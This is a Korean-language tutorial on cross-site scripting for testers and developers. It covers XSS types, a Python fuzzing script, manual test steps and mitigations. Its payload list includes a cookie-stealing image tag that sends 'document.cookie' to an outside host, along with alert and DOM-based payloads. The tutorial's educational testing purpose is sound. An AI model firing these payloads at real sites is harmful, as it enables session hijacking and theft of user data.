내가 본 통계와 경험에 따르면 XSS 취약점은 계속해서 웹 애플리케이션에 만연한 위협이 되어 데이터 도난, 세션 하이재킹 및 웹 사이트 문제의 위험을 초래하고 있습니다. 저는 이 취약성 유형을 연구하는 데 더 많은 시간을 할애하고 최소한 이 개요와 같은 기본 지식을 공유하여 많은 QA 및 개발 전문가가 이 문제에 대해 앱을 테스트할 수 있는 몇 가지 방법을 염두에 둘 수 있기로 결정했습니다. 이 기사에서는 다양한 유형의 XSS, 테스트 방법론 및 자동화 접근 방식을 살펴보고 효과적인 침투 테스트를 위한 몇 가지 예와 페이로드를 제공합니다.
XSS(교차 사이트 스크립팅)를 사용 하면 공격자가 다른 사용자가 보는 웹 페이지에 악성 스크립트를 삽입하여 클라이언트 측 코드 실행의 취약점을 악용할 수 있습니다. 다양한 유형의 XSS 취약점을 이해하고 적절한 테스트 전략을 사용하는 것은 이러한 공격으로부터 보호되는 안전한 웹 앱을 구축하는 데 중요합니다.
XSS 공격은 신뢰할 수 없는 사용자 입력이 부적절하게 처리되어 웹 애플리케이션 내에서 실행될 때 발생하며, 이를 통해 공격자는 다른 사용자의 브라우저 컨텍스트에 악성 스크립트를 삽입하고 실행할 수 있습니다.
사용자가 제공한 데이터가 적절한 유효성 검사 없이 응답에 다시 표시될 때 발생합니다.
예: <script>alert('XSS_DEMO')</script>
URL 매개변수를 통해 삽입됩니다.
이러한 악용은 웹 애플리케이션이 적절한 삭제 작업 없이 확인되지 않은 사용자 입력을 사용자 브라우저에 반영할 때 발생합니다. 이 공격에서 공격자는 피해자가 이를 클릭하면 취약한 웹 페이지의 컨텍스트 내에서 실행되는 스크립트 코드가 포함된 악성 URL을 제작합니다. 악성 스크립트는 서버에 저장되지 않고 사용자의 입력을 직접 반영합니다. 반영된 XSS 취약점은 종종 피싱 공격에 활용되거나 사용자의 검색 환경을 조작하는 데 활용됩니다. 쿠키 도난부터 세션 하이재킹까지 영향이 심각할 수 있습니다.
악성 스크립트는 서버에 영구적으로 저장되며, 다른 사용자가 접근할 경우 실행됩니다.
예: 포럼 게시물이나 소셜 네트워크 프로필 페이지의 댓글/게시물에 저장된 악성 스크립트.
영구 XSS라고도 알려진 이 공격은 공격자가 웹 애플리케이션에 악성 스크립트 코드를 삽입한 다음 서버 측에 저장하는 경우 발생합니다. 이 삽입된 스크립트는 나중에 다른 사용자가 취약한 페이지에 액세스할 때마다 검색되어 실행됩니다. 저장된 XSS 공격은 삽입된 스크립트가 시간이 지나도 지속되어 잠재적으로 여러 사용자에게 영향을 미치고 광범위한 악용으로 이어지기 때문에 특히 위험합니다. 공격자는 일반적으로 댓글, 포럼 게시물, 웹 페이지나 프로필 필드에 표시되는 엔터티 이름과 같은 사용자 생성 콘텐츠를 표적으로 삼아 악성 페이로드를 실행합니다. 저장된 XSS의 결과에는 데이터 도난, 계정 탈취, 웹사이트 훼손 등이 포함될 수 있으며, 이는 사용자와 영향을 받는 조직 모두에 심각한 위험을 초래할 수 있습니다.
스크립트 실행은 클라이언트 측의 DOM 조작에 의존합니다.
예: JS 코드는 URL 해시에서 사용자 제어 데이터를 검색하고 실행합니다.
웹 애플리케이션이 신뢰할 수 없는 사용자 입력을 기반으로 DOM을 안전하지 않은 방식으로 동적으로 조작할 때 발생합니다. 서버 측 처리를 포함하는 기존 XSS 공격과 달리 DOM 기반 XSS는 전적으로 클라이언트 측에 나타납니다. 공격자는 클라이언트 측 스크립트를 조작하여 피해자의 브라우저 내에서 임의의 코드를 실행함으로써 DOM 기반 XSS를 악용합니다. 이러한 유형의 XSS는 취약성이 클라이언트 측 코드 내에 존재하고 서버 측 테스트 중에 명확하지 않을 수 있으므로 감지하고 완화하기가 더 어려운 경우가 많습니다. DOM 기반 XSS 공격은 세션 하이재킹, 데이터 유출, 사용자를 대신한 무단 작업 등 다양한 결과를 초래할 수 있으므로 클라이언트 측 보안 조치와 세심한 웹 앱 개발 방식의 중요성이 강조됩니다.
공격자가 사용자를 속여 브라우저 내에서 악성 코드를 실행하도록 하는 사회 공학 공격입니다. 여러 사용자를 대상으로 하는 기존 XSS 공격과 달리 Self-XSS는 사용자의 신뢰를 이용하여 세션 내에서 코드를 실행합니다. 일반적으로 공격자는 기능 잠금 해제나 보상 획득과 같은 무해한 작업으로 가장하여 겉보기에 무해해 보이는 JS 코드를 브라우저의 개발자 콘솔이나 웹사이트의 일부 필드에 붙여넣도록 피해자를 유인합니다. 일단 실행되면 주입된 코드는 잠재적으로 피해자의 계정을 손상시키거나 민감한 정보를 훔치거나 피해자를 대신하여 무단 작업을 수행할 수 있습니다. 피해자의 세션으로 제한되어 있음에도 불구하고 Self-XSS는 여전히 위협으로 남아 있으며 이러한 사기성 전술을 인식하고 방지하기 위한 사용자 교육 및 인식의 중요성을 강조합니다.
일부 스크립트를 작성할 수 있습니다. 나는 Python을 선호합니다. 예를 들면 다음과 같습니다.
import requests def test_xss(url, parameter): payloads = [ "<script>alert('XSS')</script>", "<img src=x onerror=alert(1)>", # list of your payloads ] for payload in payloads: modified_url = f'{url}?{parameter}={payload}' response = requests.get(modified_url) if payload in response.text: print(f'Potential XSS detected here - {modified_url}') # example test_xss("https://testwebsite.com/search", "query_param_name")
응답을 분석하여 페이로드가 반영되거나 실행되는지 확인합니다. PoC를 생성하고, 잠재적인 영향을 이해하고, 문제 해결의 우선순위를 정하세요.
단계:
앱의 입력 필드에 스크립트 태그와 일부 JS 코드를 입력하세요.
예를 들어 기본 XSS 페이로드는 다음과 같습니다.
<script>alert('XSS');</script> (%0ejavascript:alert(/XSS/)) <script>alert('XSS')</script> // Display alert dialog with 'XSS' message. <img src=x onerror=alert(((123)> // Load broken image, trigger alert with '123'. // Cookie Theft Payload: <img src="http://website.com/stealcookie?cookie="+document.cookie> // Sends victim's cookies to attacker-controlled server. // DOM-based XSS Payload: #"><img src=x onerror=alert(123)> // Exploits DOM manipulation, triggers alert on vulnerable pages.
입력을 제출하고 스크립트가 실행되는지 확인하세요.
그렇다면 해당 응용 프로그램은 XSS 공격에 취약합니다.
스크립트가 실행되지 않으면 <img>
또는 <iframe>
과 같은 다른 HTML 태그를 추가하여 입력을 수정하고 페이지에 반영되는지 확인하세요 . 예를 들어 (이 방법은 거의 항상 저에게 효과적입니다):
<b>t</b>#`"/*—est
웹 앱 URL이나 사용자 이름, 업로드된 파일 이름 또는 변경할 수 있는 앱 페이지에 표시될 텍스트의 매개변수를 쿼리하는 스크립트를 추가할 수 있습니다.
입력에 대한 프런트엔드 검증에 유의하세요. 항상 직접 요청(Postman, Burp 또는 유사한 도구 사용)을 사용하여 값을 제출해 보세요.
때로는 페이지에 눈에 띄는 변경 사항이 표시되지 않을 수도 있지만 `"/*—
와 같은 일부 기호로 인해 페이지의 JS/HTML이 손상될 수 있으므로 개발 도구에서 브라우저 콘솔을 확인하고 콘솔에 다음과 같은 경고가 표시될 수 있습니다. XSS PoC를 얻기 위해 페이로드를 수정하는 방법에 대한 힌트를 얻으세요.
퍼징 및 페이로드 목록을 사용하십시오. 가능하면 이 접근 방식을 자동화하거나 특수 도구를 사용하십시오.
개인적으로 저는 여기에서 페이로드와 정보를 사용하는 것을 좋아합니다. 제 생각에는 매우 유용한 리소스입니다.
XSS PoC
print()
기능과 같은 대체 페이로드를 활용합니다.고급 XSS 공격
XSS 필터 우회
출력 데이터가 렌더링되는 컨텍스트를 기반으로 데이터를 인코딩합니다. HTML, JS, CSS 및 기타 컨텍스트에 대해 다양한 인코딩 방법을 적용하여 XSS에 대한 포괄적인 보호를 보장합니다.
예를 들어 , HTML 콘텐츠에 대한 HTML 엔터티 인코딩, 인라인 스크립트 컨텍스트에 대한 JavaScript 이스케이프, 스타일 속성에 대한 CSS 이스케이프를 사용하여 스크립트 삽입을 방지하고 다양한 출력 컨텍스트에서 데이터 무결성을 유지합니다.
허용 및 금지된 문자, 패턴 또는 콘텐츠 유형의 사전 정의된 허용 목록 및 거부 목록을 기반으로 사용자 입력을 필터링하고 검증하기 위해 입력 화이트리스트 및 블랙리스트를 구현합니다.
XSS는 웹 앱에 지속적인 위협을 가해 데이터 침해와 사용자 신뢰를 위협합니다. 효과적인 완화를 위해서는 XSS 유형과 테스트 방법을 이해하는 것이 중요합니다. 입력 유효성 검사, 출력 인코딩, CSP 구현과 같은 방지 기술은 앱 보안을 향상시킵니다. 보안 관행과 협업의 우선순위를 높임으로써 팀은 XSS로부터 앱을 보호하고 적절한 웹 앱 보안을 보장할 수 있습니다.
초보자이고 사이버 보안 및 침투 테스트에 관심이 있거나 앱을 더욱 안전하게 만들기 위해 앱을 개선하려는 경우 다음 주제에 대한 내 기사를 읽어보세요.
XSS 및 페이로드에 대한 자세한 내용은 다음 리소스를 참조하세요.
항상 명시적인 허가를 받아 통제된 환경 내에서 침투 테스트를 수행하십시오. 이러한 윤리적 접근 방식은 보안 평가가 책임 있는 테스트 프로토콜과 일치하도록 보장하여 시스템에 대한 우발적인 손상을 방지하고 테스트 프로세스와 중요한 사이버 보안 전략 모두의 무결성을 유지합니다.